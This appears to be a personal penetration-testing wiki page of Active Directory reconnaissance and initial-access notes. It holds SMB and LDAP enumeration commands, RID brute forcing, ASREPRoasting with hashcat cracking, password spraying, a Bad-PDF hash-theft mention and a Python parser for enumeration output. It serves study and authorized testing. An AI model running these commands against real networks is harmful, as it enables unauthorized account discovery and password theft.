Reconnaissance
OSINT
Generate Active Domain username conventions
SMB Enumeration
Nmap
nmap --script "smb-vuln*" -p 139,445 [ip]
Netexec
## List Shares - Null session (empty username and password)
netexec smb [host/ip] -u '' -p '' --shares
## List Shares - Guest session
netexec smb [host/ip] -u guest -p '' --shares
## Spider Module through files
netexec smb [host/ip] -u [user] -p [pass] -M spider_plus
Enum4linux
enum4linux -a -u "" -p "" <DC IP>
enum4linux -a -u "guest" -p "" <DC IP>
Smbclient
smbclient -N -L //[ip]
smbclient //[ip]/[share name] -U '[username]%[password]'
Additional Resources
- SMB - Share Enumeration Cheat Sheet
- BIWasp/NetExec cheat sheet
- SMB Enumeration cheat sheet
- CrackMapExec + NetExec cheat sheet
Rid Brute via SMB
Credits to 0xdf located here
Every Windows object (including users and groups) has a security identifier, or SID. The SID is a unique ID that encodes information about the domain configuration, and might look something like S-1-5-21-1004336348-1177238915-682003330-512.
Within a domain or stand-alone host, the entire SID except the last number will be the same, and the last number is the relative identifier, or RID. These values fall in a predictable range, and thus, we can brute force the numbers across that range and get a list of users and groups.
Requires: Guest read access to IPC$ (Remote IPC) SMB File Share
## Using Netexec
nxc smb [IP] -u 'guest' -p '' --rid-brute > sid.txt
## Keep only user objects (SidTypeUser), take the DOMAIN\name field and strip the domain prefix
grep 'SidTypeUser' sid.txt | awk -F': ' '{print $2}' | awk '{print $1}' | sed 's/.*\\//' > users.txt
## Using rpcclient
rpcclient [IP] -U 'guest%'
lookupnames administrator
lookupsids S-1-5-21-622327497-3269355298-2248959698-[RID_value]
## Using Impacket
lookupsid.py guest@[IP] -no-pass
## ASrep Hashes via Username Enumeration
GetNPUsers.py [DOMAIN]/ -usersfile users.txt -dc-ip [DC IP] -format hashcat -outputfile creds.txt
hashcat -m 18200 creds.txt /usr/share/wordlists/rockyou.txt
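As an added example (not part of the original page or of the tools it lists), a small Python helper that does what the awk/sed pipeline above does, in a form that can be checked: it parses `--rid-brute` output into RID, domain, name and SID type, keeps only user objects, and splits a SID into its domain prefix and RID so that well-known RIDs can be labelled. The sample output, the 192.0.2.10 address and the account names in it are constructed.

```python
import re
from typing import List, NamedTuple, Tuple

# RIDs that are the same in every domain (constant suffixes of the domain SID).
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    515: "Domain Computers", 516: "Domain Controllers", 519: "Enterprise Admins",
}

# Domain SIDs look like S-1-5-21-<a>-<b>-<c>-<RID>; everything before the last dash is the domain part.
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")

def split_sid(sid: str) -> Tuple[str, int]:
    """Return (domain SID prefix, RID) for a domain SID, or raise on anything else."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    rid = m.group(1)
    return sid[: -(len(rid) + 1)], int(rid)

class RidEntry(NamedTuple):
    rid: int
    domain: str
    name: str
    sid_type: str

# netexec prints one line per resolved RID: "... 500: DOMAIN\Name (SidTypeUser)".
# Names may contain spaces ("Domain Admins"), so the name is matched lazily up to the type.
LINE_RE = re.compile(r"(\d+):\s+([^\\\s]+)\\(.+?)\s+\((SidType\w+)\)\s*$")

def parse_rid_brute(output: str) -> List[RidEntry]:
    """Parse netexec/nxc --rid-brute output; banner and status lines are skipped."""
    entries = []
    for line in output.splitlines():
        m = LINE_RE.search(line)
        if m:
            entries.append(RidEntry(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return entries

def users_only(entries: List[RidEntry]) -> List[str]:
    """The equivalent of users.txt: bare usernames of SidTypeUser objects, domain prefix stripped."""
    return [e.name for e in entries if e.sid_type == "SidTypeUser"]

# Constructed sample of --rid-brute output (hypothetical host 192.0.2.10, domain BLACKFIELD).
SAMPLE = """\
SMB  192.0.2.10  445  DC01  [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local)
SMB  192.0.2.10  445  DC01  [+] BLACKFIELD.local\\guest:
SMB  192.0.2.10  445  DC01  [+] Brute forcing RIDs
SMB  192.0.2.10  445  DC01  500: BLACKFIELD\\Administrator (SidTypeUser)
SMB  192.0.2.10  445  DC01  501: BLACKFIELD\\Guest (SidTypeUser)
SMB  192.0.2.10  445  DC01  512: BLACKFIELD\\Domain Admins (SidTypeGroup)
SMB  192.0.2.10  445  DC01  1103: BLACKFIELD\\support (SidTypeUser)
"""
```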
LDAP Enumeration
Nmap
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>
LDAPSearch
## Domain naming contexts (anonymous bind)
ldapsearch -x -H ldap://BLACKFIELD -s base namingcontexts
## Search users (authenticated bind, password prompted by -W)
ldapsearch -x -H ldap://BLACKFIELD -D 'CN=support,CN=users,DC=BLACKFIELD,DC=local' -W -b 'DC=BLACKFIELD,DC=local' '(objectClass=user)'
## Accounts configured for constrained delegation
ldapsearch -H ldap://192.168.110.55 -x -D "web_svc@painters.htb" -W -b "dc=painters,dc=htb" "(msDS-AllowedToDelegateTo=*)" msDS-AllowedToDelegateTo
Poisoning and Relay
Refer to Poisoning and Relay
Web Application Vulnerabilities
Bad PDF
Bad-PDF creates a malicious PDF file that steals NTLM (NTLMv1/NTLMv2) hashes from Windows machines when the file is opened. It uses a vulnerability disclosed by the Check Point research team to build the PDF, and the hashes are captured with a Responder listener.
Integrated DNS Dump
Any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer.
Initial Access
Password Spraying
Password Spraying via Sprayhound
- Checks the badPwdCount attribute against the lockout threshold of the default domain password policy only; fine-grained password policies are not taken into account
ASREPRoasting
ASREPRoast is an attack against user accounts for which Kerberos pre-authentication is not required. Because pre-authentication is disabled, an attacker can request authentication for such a user from the Domain Controller (DC) without knowing the user's password. The DC responds with a message encrypted with the user's password-derived key, which the attacker can attempt to crack offline to recover the password.
Targets: if a domain user account does not require Kerberos pre-authentication, we can request a valid TGT for this account without having any domain credentials, extract the encrypted blob and brute-force it offline.
## Request AS_REP message
python GetNPUsers.py [Domain]/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
Article Information
- Author: Tony Wu
- URL: https://qwutony.github.io/wiki/003-1-Reconnaissance/
- License: Free to share - NonCommercial - NoDerivatives - Attribution required (Creative Commons BY-NC-ND 4.0 License)